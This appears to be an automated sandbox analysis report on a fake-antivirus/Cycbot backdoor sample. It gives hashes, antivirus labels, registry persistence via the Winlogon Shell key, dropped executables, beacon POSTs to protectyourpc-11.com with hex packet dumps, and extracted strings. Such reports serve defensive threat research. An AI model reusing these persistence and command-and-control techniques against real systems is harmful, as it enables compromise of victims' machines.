Analysis Date2014-06-15 05:51:34
MD5dee0cd39d8347401c483ae2104f2131b
SHA14f1ed8c37b973e82a39c47bfc49cf0446b162d64

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 061042998429bf28becae3b5db57fd0b sha1: e3ba22761aef1c2b7ec1b7e5241fb39536cde68a size: 65024
Section.rdata md5: 27f9fd4e6e8dc33a6266477999b64866 sha1: 5393280d3804d498b9234be11dbcb1d8fcadc52d size: 4096
Section.data md5: 4a5377e45257c1395782f99ded0c91e0 sha1: da57d8ddd87cae7b2da843443f016375049f5727 size: 48128
Section.rsrc md5: e165e8e03e1d8b3e25b86e076bfef020 sha1: ef872a643e04e37cdec1f3beb217168bd29c7f75 size: 1024
Timestamp2005-11-24 22:59:31
VersionPrivateBuild: 1148
FileDescription: MS Shell
PEhash25f293eb6284ae3e8432f1252fe1d9a94f64d84f
IMPhashb20735b3dd2fe93d982c537a2278038b
AV360 SafeGen:Variant.Kazy.2365
AV360 SafeGen:Variant.Kazy.2365
AVAd-AwareGen:Variant.Kazy.2365
AVAd-AwareGen:Variant.Kazy.2365
AVAlwil (avast)MalOb-IJ [Cryp]
AVAlwil (avast)MalOb-IJ [Cryp]
AVArcabit (arcavir)Downloader.Fraudload.Hdx
AVArcabit (arcavir)Downloader.Fraudload.Hdx
AVAuthentiumW32/Goolbot.B.gen!Eldorado
AVAuthentiumW32/Goolbot.B.gen!Eldorado
AVAvira (antivir)TR/Crypt.XPACK.Gen
AVAvira (antivir)TR/Crypt.XPACK.Gen
AVCA (E-Trust Ino)Win32/FakeAV.S!generic
AVCA (E-Trust Ino)Win32/FakeAV.S!generic
AVCAT (quickheal)Backdoor.Cycbot.B
AVCAT (quickheal)Backdoor.Cycbot.B
AVClamAVWin.Trojan.Agent-599622
AVClamAVWin.Trojan.Agent-599622
AVDr. WebTrojan.Siggen2.7743
AVDr. WebTrojan.Siggen2.7743
AVEmsisoftGen:Variant.Kazy.2365
AVEmsisoftGen:Variant.Kazy.2365
AVEset (nod32)Win32/Kryptik.IAV
AVEset (nod32)Win32/Kryptik.IAV
AVFortinetW32/FakeAV.BZD!tr
AVFortinetW32/FakeAV.BZD!tr
AVFrisk (f-prot)W32/Goolbot.B.gen!Eldorado (generic, not disinfectable)
AVFrisk (f-prot)W32/Goolbot.B.gen!Eldorado (generic, not disinfectable)
AVF-SecureGen:Variant.Kazy.2365
AVF-SecureGen:Variant.Kazy.2365
AVGrisoft (avg)Cryptic.BFI
AVGrisoft (avg)Cryptic.BFI
AVIkarusTrojan.Win32.FakeAV
AVIkarusTrojan.Win32.FakeAV
AVKasperskyTrojan-Downloader.Win32.FraudLoad.hdx
AVKasperskyTrojan-Downloader.Win32.FraudLoad.hdx
AVMalwareBytesBackdoor.Gbot
AVMalwareBytesBackdoor.Gbot
AVMcafeeBackDoor-EXI
AVMcafeeBackDoor-EXI
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicroWorld (escan)Gen:Variant.Kazy.2365
AVMicroWorld (escan)Gen:Variant.Kazy.2365
AVNormanswizzor/Heur.I
AVNormanswizzor/Heur.I
AVRisingTrojan.Win32.Generic.125DE368
AVRisingTrojan.Win32.Generic.125DE368
AVSophosTroj/FakeAv-BWP
AVSophosTroj/FakeAv-BWP
AVSymantecTrojan.FakeAV!gen39
AVSymantecTrojan.FakeAV!gen39
AVTrend MicroBKDR_CYCBOT.SME
AVTrend MicroBKDR_CYCBOT.SME
AVVirusBlokAda (vba32)TrojanDownloader.FraudLoad

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝
explorer.exe,C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\shell.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\shell.exe
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\stor.cfg
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\svchost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{C66E79CE-8935-4ed9-A6B1-4983619CB925}
Creates Mutex{655A89EF-C8EC-4587-9504-3DB66A15085F}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex{35BCA615-C82A-4152-8857-BCC626AE4C8D}
Winsock DNSwww.google.com
Winsock DNS127.0.0.1
Winsock DNScheckserverstatux.com
Winsock DNSwhysohardx.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\svchost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates ProcessC:\Documents and Settings\Administrator\Application Data\Microsoft\svchost.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe

Network Details:

DNSwww.google.com
Type: A
64.233.171.106
DNSwww.google.com
Type: A
64.233.171.105
DNSwww.google.com
Type: A
64.233.171.104
DNSwww.google.com
Type: A
64.233.171.103
DNSwww.google.com
Type: A
64.233.171.99
DNSwww.google.com
Type: A
64.233.171.147
DNSprotectyourpc-11.com
Type: A
69.43.161.170
DNSwhysohardx.com
Type: A
DNScheckserverstatux.com
Type: A
HTTP GEThttp://www.google.com/
User-Agent:
HTTP GEThttp://www.google.com/
User-Agent:
HTTP POSThttp://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v42&system=6.0.2900|5.1.2600|1033&id=C059900AFF044FFC75DE&status=main&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v42&system=6.0.2900|5.1.2600|1033&id=C059900AFF044FFC75DE&status=err084&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v42&system=6.0.2900|5.1.2600|1033&id=C059900AFF044FFC75DE&status=err095_2_7&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Flows TCP192.168.1.1:1031 ➝ 64.233.171.106:80
Flows TCP192.168.1.1:1032 ➝ 64.233.171.106:80
Flows TCP192.168.1.1:1033 ➝ 69.43.161.170:80
Flows TCP192.168.1.1:1034 ➝ 69.43.161.170:80
Flows TCP192.168.1.1:1035 ➝ 69.43.161.170:80

Raw Pcap
0x00000000 (00000)   47455420 2f204854 54502f31 2e300d0a   GET / HTTP/1.0..
0x00000010 (00016)   436f6e6e 65637469 6f6e3a20 636c6f73   Connection: clos
0x00000020 (00032)   650d0a48 6f73743a 20777777 2e676f6f   e..Host: www.goo
0x00000030 (00048)   676c652e 636f6d0d 0a416363 6570743a   gle.com..Accept:
0x00000040 (00064)   202a2f2a 0d0a0d0a                      */*....

0x00000000 (00000)   47455420 2f204854 54502f31 2e300d0a   GET / HTTP/1.0..
0x00000010 (00016)   436f6e6e 65637469 6f6e3a20 636c6f73   Connection: clos
0x00000020 (00032)   650d0a48 6f73743a 20777777 2e676f6f   e..Host: www.goo
0x00000030 (00048)   676c652e 636f6d0d 0a416363 6570743a   gle.com..Accept:
0x00000040 (00064)   202a2f2a 0d0a0d0a                      */*....

0x00000000 (00000)   504f5354 202f6367 692d6269 6e2f6379   POST /cgi-bin/cy
0x00000010 (00016)   636c655f 7265706f 72742e63 67693f74   cle_report.cgi?t
0x00000020 (00032)   7970653d 675f7634 32267379 7374656d   ype=g_v42&system
0x00000030 (00048)   3d362e30 2e323930 307c352e 312e3236   =6.0.2900|5.1.26
0x00000040 (00064)   30307c31 30333326 69643d43 30353939   00|1033&id=C0599
0x00000050 (00080)   30304146 46303434 46464337 35444526   00AFF044FFC75DE&
0x00000060 (00096)   73746174 75733d6d 61696e26 6e3d3026   status=main&n=0&
0x00000070 (00112)   65787472 613d3020 48545450 2f312e31   extra=0 HTTP/1.1
0x00000080 (00128)   0d0a486f 73743a20 70726f74 65637479   ..Host: protecty
0x00000090 (00144)   6f757270 632d3131 2e636f6d 0d0a5573   ourpc-11.com..Us
0x000000a0 (00160)   65722d41 67656e74 3a204d6f 7a696c6c   er-Agent: Mozill
0x000000b0 (00176)   612f342e 30202863 6f6d7061 7469626c   a/4.0 (compatibl
0x000000c0 (00192)   653b204d 53494520 362e303b 2057696e   e; MSIE 6.0; Win
0x000000d0 (00208)   646f7773 204e5420 352e3129 0d0a436f   dows NT 5.1)..Co
0x000000e0 (00224)   6e74656e 742d4c65 6e677468 3a20300d   ntent-Length: 0.
0x000000f0 (00240)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000100 (00256)   73650d0a 0d0a                         se....

0x00000000 (00000)   504f5354 202f6367 692d6269 6e2f6379   POST /cgi-bin/cy
0x00000010 (00016)   636c655f 7265706f 72742e63 67693f74   cle_report.cgi?t
0x00000020 (00032)   7970653d 675f7634 32267379 7374656d   ype=g_v42&system
0x00000030 (00048)   3d362e30 2e323930 307c352e 312e3236   =6.0.2900|5.1.26
0x00000040 (00064)   30307c31 30333326 69643d43 30353939   00|1033&id=C0599
0x00000050 (00080)   30304146 46303434 46464337 35444526   00AFF044FFC75DE&
0x00000060 (00096)   73746174 75733d65 72723038 34266e3d   status=err084&n=
0x00000070 (00112)   30266578 7472613d 30204854 54502f31   0&extra=0 HTTP/1
0x00000080 (00128)   2e310d0a 486f7374 3a207072 6f746563   .1..Host: protec
0x00000090 (00144)   74796f75 7270632d 31312e63 6f6d0d0a   tyourpc-11.com..
0x000000a0 (00160)   55736572 2d416765 6e743a20 4d6f7a69   User-Agent: Mozi
0x000000b0 (00176)   6c6c612f 342e3020 28636f6d 70617469   lla/4.0 (compati
0x000000c0 (00192)   626c653b 204d5349 4520362e 303b2057   ble; MSIE 6.0; W
0x000000d0 (00208)   696e646f 7773204e 5420352e 31290d0a   indows NT 5.1)..
0x000000e0 (00224)   436f6e74 656e742d 4c656e67 74683a20   Content-Length: 
0x000000f0 (00240)   300d0a43 6f6e6e65 6374696f 6e3a2063   0..Connection: c
0x00000100 (00256)   6c6f7365 0d0a0d0a                     lose....

0x00000000 (00000)   504f5354 202f6367 692d6269 6e2f6379   POST /cgi-bin/cy
0x00000010 (00016)   636c655f 7265706f 72742e63 67693f74   cle_report.cgi?t
0x00000020 (00032)   7970653d 675f7634 32267379 7374656d   ype=g_v42&system
0x00000030 (00048)   3d362e30 2e323930 307c352e 312e3236   =6.0.2900|5.1.26
0x00000040 (00064)   30307c31 30333326 69643d43 30353939   00|1033&id=C0599
0x00000050 (00080)   30304146 46303434 46464337 35444526   00AFF044FFC75DE&
0x00000060 (00096)   73746174 75733d65 72723039 355f325f   status=err095_2_
0x00000070 (00112)   37266e3d 30266578 7472613d 30204854   7&n=0&extra=0 HT
0x00000080 (00128)   54502f31 2e310d0a 486f7374 3a207072   TP/1.1..Host: pr
0x00000090 (00144)   6f746563 74796f75 7270632d 31312e63   otectyourpc-11.c
0x000000a0 (00160)   6f6d0d0a 55736572 2d416765 6e743a20   om..User-Agent: 
0x000000b0 (00176)   4d6f7a69 6c6c612f 342e3020 28636f6d   Mozilla/4.0 (com
0x000000c0 (00192)   70617469 626c653b 204d5349 4520362e   patible; MSIE 6.
0x000000d0 (00208)   303b2057 696e646f 7773204e 5420352e   0; Windows NT 5.
0x000000e0 (00224)   31290d0a 436f6e74 656e742d 4c656e67   1)..Content-Leng
0x000000f0 (00240)   74683a20 300d0a43 6f6e6e65 6374696f   th: 0..Connectio
0x00000100 (00256)   6e3a2063 6c6f7365 0d0a0d0a            n: close....


Strings
.
.<..
.
}
2

040904b0
1148
FileDescription
&Main
MS Sans Serif
MS Shell
PrivateBuild
S&top
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
000RT~U-
&18	Oirz
}1P1gQ-..
(2j<fi
_?2mHA{
??2@YAPAXI@Z
 -2YZ)
@3aLP^o?
??3@YAXPAX@Z
58'&HQ&
5jmC(e
5PL9PR'
5WJ=ip
/>5x<2
5Zoxt7yw
6D/;}t
6FV3Q}!ko
7j*,Jp
7);U`S~
7v(Zn*
7z-}NY
"8B4Do
8^L0""
'8(nh!
]8ZkErg2
$a2V_0
ADVAPI32.dll
^A#-e+
aKA=e T?b
[akY}p;
_amsg_exit
BuZk`HOp'
CallNtPowerInformation
CertEnumSystemStoreLocation
_cexit
CheckDlgButton
CloseHandle
CloseThemeData
CoCreateInstance
CoInitializeEx
CommandLineToArgvW
_controlfp
CoTaskMemFree
CreateFontIndirectW
CreateSolidBrush
CreateThread
CreateWindowExW
CRYPT32.dll
CryptEncodeObject
CryptEncodeObjectEx
c_v^t-
`cYV9/KN7
@.data
DefWindowProcW
DeleteCriticalSection
DeleteObject
DestroyWindow
DialogBoxParamW
DispatchMessageW
%;D&Su
, dwNh
EnableWindow
EndDialog
EnterCriticalSection
*e QRC6
ExitProcess
#e YVL
F=4xYE
f5wcmSw'
f^}biVn
f&dYRev0
FindResourceW
FindWindowExW
FindWindowW
foqq*c
FPPrg!
FreeResource
f[t1'=
~fxTt1o
GDI32.dll
GetCurrentProcess
GetCurrentProcessId
GetCurrentThreadId
GetDlgCtrlID
GetDlgItem
GetLastError
GetMessageW
GetModuleHandleA
GetParent
>GetPh_
GetProcessVersion
GetStartupInfoW
GetSysColor
GetSysColorBrush
GetSystemTimeAsFileTime
GetThemeColor
GetThemeFont
GetTickCount
GetTraceEnableFlags
GetTraceEnableLevel
GetTraceLoggerHandle
GetWindowLongW
GetWindowTextLengthW
GetWindowTextW
GlobalAlloc
hhualP
h\oL]"
hPZWiE
hR)PP/pW0e
InitializeCriticalSection
_initterm
InterlockedCompareExchange
InterlockedDecrement
InterlockedExchange
InterlockedIncrement
IsDlgButtonChecked
It!L,N
J_(3yY
>JD0/O#'
jo@g>W
k7x4[1u
KERNEL32.dll
KillTimer
KW9]4"
$KxbD)
l.4$SYz
LeaveCriticalSection
llyvps,j
LoadIconW
LoadResource
LoadStringW
LocalAlloc
LocalFree
LockResource
%>L?w|
L'xLvc
m)4ia)
memset
M(ho3@
MPwhxyw
msvcrt.dll
]@,nDdeF
n*Hy<\
nUJ<VR
+*O#De
ole32.dll
OpenThemeData
]@oRKdZ
)Owx9L
__p__commode
P`D^y[Y
__p__fmode
PmXP-lb
PostMessageW
PostQuitMessage
POWRPROF.dll
P[(P]yA
p_vny.
,|)QI!
Q)r/qw
!=,q@U
QueryPerformanceCounter
`.rdata
RegCloseKey
RegCreateKeyExW
RegCreateKeyW
RegisterClassExW
RegisterDeviceNotificationW
RegisterTraceGuidsW
RegOpenKeyExW
RegQueryValueExW
RegSetValueExW
*?Rq5e
?	[Rr5
"rwo'Vw
"[rx3x
RZ0MNnLV
SendDlgItemMessageW
SendMessageW
SetActiveWindow
__set_app_type
SetBkColor
SetDlgItemTextW
SetFocus
SetForegroundWindow
SetTextColor
SetTimer
SetUnhandledExceptionFilter
SETUPAPI.dll
SetupDiDestroyDeviceInfoList
SetupDiEnumDeviceInterfaces
SetupDiGetClassDevsExW
__setusermatherr
SetWindowLongW
SetWindowTextW
SHELL32.dll
ShellExecuteExW
ShowWindow
-s]Pgw
,,sY^4\
TerminateProcess
?terminate@@YAXXZ
!This program cannot be run in DOS mode.
ThlFreh}
ThLibrh
ThLocah
TPh`a@
TraceMessage
TranslateMessage
T<ThM?@
tw~\+c
tztl**,Q|?
UnhandledExceptionFilter
UnregisterClassW
UnregisterDeviceNotification
UnregisterTraceGuids
USER32.dll
UxTheme.dll
'VhS\	
V.I^iG
_vsnwprintf
~~~Vw-
VW17?L
>w/?_3
WaitForSingleObject
_wcmdln
_wcsicmp
wcstoul
__wgetmainargs
WideCharToMultiByte
WTSAPI32.dll
WTSRegisterSessionNotification
WTSUnRegisterSessionNotification
wzk0<I
 X97yV8lC&/_A
_XcptFilter
x;%	K+Y>Kk
xx~dpj_)
^XZWK-
Y<L0=?
Y(}.%,w
?z6|MM
zC	KS!
..ZLhP